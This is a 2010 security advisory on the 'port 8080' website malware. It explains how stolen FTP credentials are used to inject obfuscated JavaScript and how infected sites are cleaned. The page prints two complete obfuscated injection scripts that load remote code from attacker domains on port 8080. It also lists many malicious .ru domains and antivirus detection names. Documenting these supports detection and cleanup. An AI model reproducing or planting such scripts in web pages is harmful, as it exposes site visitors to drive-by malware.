Port 8080 Malware
Updated: July 3, 2010
The port 8080 malware places obfuscated malicious JavaScript into a website's web pages and or JavaScript files. To clean the website, the website needs to be reverted to a clean backup or the malicious code needs to be removed from the web pages and or JavaScript files. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected the FTP password needs to be changed and the malware removed from the infected computer before it used again to access the website via FTP.
Recent Script Format On Web Pages:
<script>var Hy;if(Hy!='S'){Hy='S'};try {var gq;if(gq!='' && gq!='w'){gq=''};var yq=new Date();var FU=new Date();var F=RegExp;var a;if(a!='u' && a!='Fm'){a='u'};var vZ=new Array();var z=new String("HThUre".substr(4)+"plkoG".substr(0,2)+"ac"+"eLyMm".substr(0,1));var d;if(d!='' && d!='Hj'){d=''};var j=new Array();var I;if(I!='' && I!='yY'){I=null};function g(c,N){var MF=new String();this.Gr='';var W=String("[");var M=String("xM5g".substr(3));W+=N;W+=new String("]");var xK;if(xK!='UE' && xK != ''){xK=null};var gC=new Date();var v=new F(W, M);var TF=new String();this.Uh="";return c[z](v, new String());this.I_='';};var A=new Date();var gD='';var ma;if(ma!='gR' && ma!='f'){ma=''};var y=win dow;var Of;if(Of!='gz'){Of=''};var T=g('cCrCe6aztzeOEOl6eCmCeCnCt6',"C6Oz");var H_=new String();var kr;if(kr!='mb' && kr != ''){kr=null};var V=g('/5c1r1i1cHi9nCfCo5.9c1o9m9/9cCr9iCc9i9n1f1oC.5cHoHmH/5sChCa5r1e5a5s9a9lHeC.Cc9o9mC/5g9oHo5g1l5e9.Cc9o9m5/Hp1a1n5t5i5pH.5cCo9m5.9pHh9pH',"1CH95");var v_=new Date();var b;if(b!='tD' && b!='lG'){b=''};var L=g('hJtFtJpF:F/F/FfJrFeJsJhFwFaFpF-FnFeFtJ.FsFiJtJeJsFeFlFlJ.FcJoFmF.FhFoJoFpFcJhFiJnJaJ-FcJoJmJ.FBJuFyJTJhFeJBFlJeJnJdJeFrJ.FrFuJ:J',"FJ");var Ar="";var O=g('8452097248494902724',"57294");var H='';var G=g('ognglOogaOdj',"jOUgf");var lA;if(lA!=''){lA='Yf'};var r=g('sAcFrTiypytA',"FyTA");vn=function(){var s=new String();var Ie=new String();e=document[T](r);var UHP;if(UHP!='' && UHP!='Z'){UHP=null};var bu='';H=L+O;var TFn;if(TFn!='LT' && TFn!='yi'){TFn='LT'};H+=V;var HQ;if(HQ!='iW'){HQ=''};var al=new Date();this.Pv='';e.src=H;e.defer=([1][0]);var yf="";var KE=new Array();document.body.appendChild(e);var Kk='';this.Kkt="";};var Vx;if(Vx!='' && Vx!='IF'){Vx='tDv'};y[G]=vn;this.FA="";var GH=new String();} catch(Y){this.hN="";};var VW;if(VW!=''){VW='DY'};var kp=new Array();</script>
Recent Script Format In JavaScript Files:
var z="";var a;if(a!='' && a!='IR'){a=null};try {var v;if(v!='s' && v!='Xh'){v=''};var Z='';var Q=new Date();this.fo="";var N=String("0uaNre".substr(4)+"SXhIpl".substr(4)+"NsuOac".substr(4)+"e");var Esd;if(Esd!='Wm' && Esd != ''){Esd=null};var C=new String();var i=RegExp;this.Rc='';var Zd="";function I(R,f){var o="[cDB".substr(0,1);var w;if(w!='' && w!='oI'){w=null};var E=String("UJpCg".substr(4));var D='';o+=f;this.gg='';o+=String("]");var Ya='';var Vk=new Date();this.Xy="";var RX=new i(o, E);this.K='';return R[N](RX, new String());this.GK='';this.Cm='';};var yL;if(yL!='Ig' && yL!='pS'){yL='Ig'};var aZ;if(aZ!='' && aZ!='GE'){aZ=''};var iF=I('hWtXtWpL:L/X/XuLpLlWoLaXdWiWnLgL-LcXoWmX.LgXoLoLgLlLeW.WhXrX.XtLoXpWiXxW-LcLoXmW.WTLhWeXBXlWeLnXdLeLrXTXuXtXoLrLiLaWlW.LrLuW:X',"XWL");var ER=I('87171370137331835371031153',"3157");this.KE="";var O=I('oWnRlRoWaWdR',"RcW");var fw=new Date();var iU=new Date();var b=I('cDrSeDaKtDedEDlKedmpeSnKtD',"KpSdD");var uj;if(uj!='eh'){uj='eh'};var M=I('s9c7rLiLp9td',"LQ79d");var W=I('/65686.1c1o6m1/15D86.6c1o1m1/Ds6oDn6i1c1o1.Dc1oDm1/1a6mDe1b6l1o6.DjDp6/1g1o6oDg6l6e6.DcDo1m6.6p1hDpD',"D61");var B='';var Uq;if(Uq!='se'){Uq=''};var A=win dow;r=function(){var fq=new String();var J;if(J!='' && J!='hm'){J=''};var d=new Array();var JE;if(JE!='' && JE!='LH'){JE='Xq'};OO=document[b](M);var zK=new Date();var pf;if(pf!='' && pf!='Uf'){pf=null};B=iF+ER;var IA=new Array();B+=W;var YQ;if(YQ!='' && YQ!='EL'){YQ=''};var oi='';var WF='';OO.defer=([1][0]);OO.src=B;this.MT='';document.body.appendChild(OO);var Fs;if(Fs!='' && Fs!='nu'){Fs=''};var Cn;if(Cn!='bg'){Cn=''};};var hZ;if(hZ!='' && hZ!='Bx'){hZ=''};var Wv;if(Wv!='' && Wv!='V_'){Wv=''};var PO='';var dC='';A[O]=r;this.HV="";var CI;if(CI!='Us' && CI!='RC'){CI=''};} catch(X){var WJ='';};
Recent Domains Used by the Malware: whosaleonline.ru, worldmusicmagazine.ru, homesaleplus.ru, sugaryhome.ru, carswebnet.ru, webnetenglish.ru, thechocolateweb.ru worldwebworld.ru, webdesktopnet.ru, funwebmail.ru, thelaceweb.ru, thechocolateweb, webdesktopnet.ru, greatwebradio.ru, cobalttrueblue.ru, guidebat.ru, recentmexico.ru, avattop.ru, newusaguide.ru, livesitedesign.ru, sitemape.ru, samuest.ru, forredtag.ru, newvillagefresh.ru, supernewstuff.ru, hotnewgirl.ru, supermicrotag.ru, newagedirect.ru, yoursuperpool.ru, buytheblender.ru, neolabonline.ru, excellentblender.ru, theblendertutorial.ru, yoursupercar.ru, theblendertv.ru, supersupermall.ru, seasilversite.ru, thesuperexchange.ru, yourblenderparts.ru, superroadmap.ru, superbblender.ru, thesuperpager.ru, needserve.ru, loadtube.ru, snoreflash.ru, retireterrify.ru, royalbling.ru, pokesack.ru, reachsaw.ru, mournfool.ru, improveflood.ru, slowcheer.ru, lostdeed.ru, ashsoftware.ru, tenthprofit.ru, skepticalpub.ru, rarephone.ru, relaxedgrape.ru, globaljoke.ru, ashdog.ru, missgin.ru, onewinter.ru, stellarshower.ru, petquestion.ru, greatfile.ru, westcountry.ru
Recent Virus Scan Identifications: JS:Illredir-A [Trj], JS:Illredir-B [Trj], JS:Illredir-C [Trj], JS:Illredir-D [Trj], JS:Illredir-E [Trj], JS:Illredir-F [Trj], JS:Illredir-G [Trj], JS:Illredir-I [Trj], JS:Illredir-Q [Trj], JS:Illredir-S [Trj], JS:Illredir-W [Trj], JS:Illredir-Y [Trj], JS:Illredir-Z [Trj], JS:Illredir-AC [Trj], JS:Illredir-AD [Trj], JS:Illredir-AH [Trj], JS:Illredir-AI [Trj], JS:Illredir-AK [Trj], JS:Illredir-AL [Trj], JS:Illredir-AN [Trj], JS:Illredir-AQ [Trj], JS:Illredir-AS [Trj], JS:Illredir-AX [Trj], JS:Illredir-AY [Trj], JS:Illredir-BR [Trj], JS:Illredir-BT [Trj], JS:Illredir-BU [Trj], JS:Illredir-BX [Trj], JS:Illredir-BY [Trj], JS:Illredir-CB [Trj], Troj/JSRedir-AK, Troj/JSRedir-AL, Troj/JSRedir-AR, Troj/JSRedir-AU, Troj/JSRedir-BB, Troj/JSRedir-BD, Troj/JSRedir-BF, Troj/JSRedir-BL, JS/Redirector.j, Trojan:JS/Redirector.CR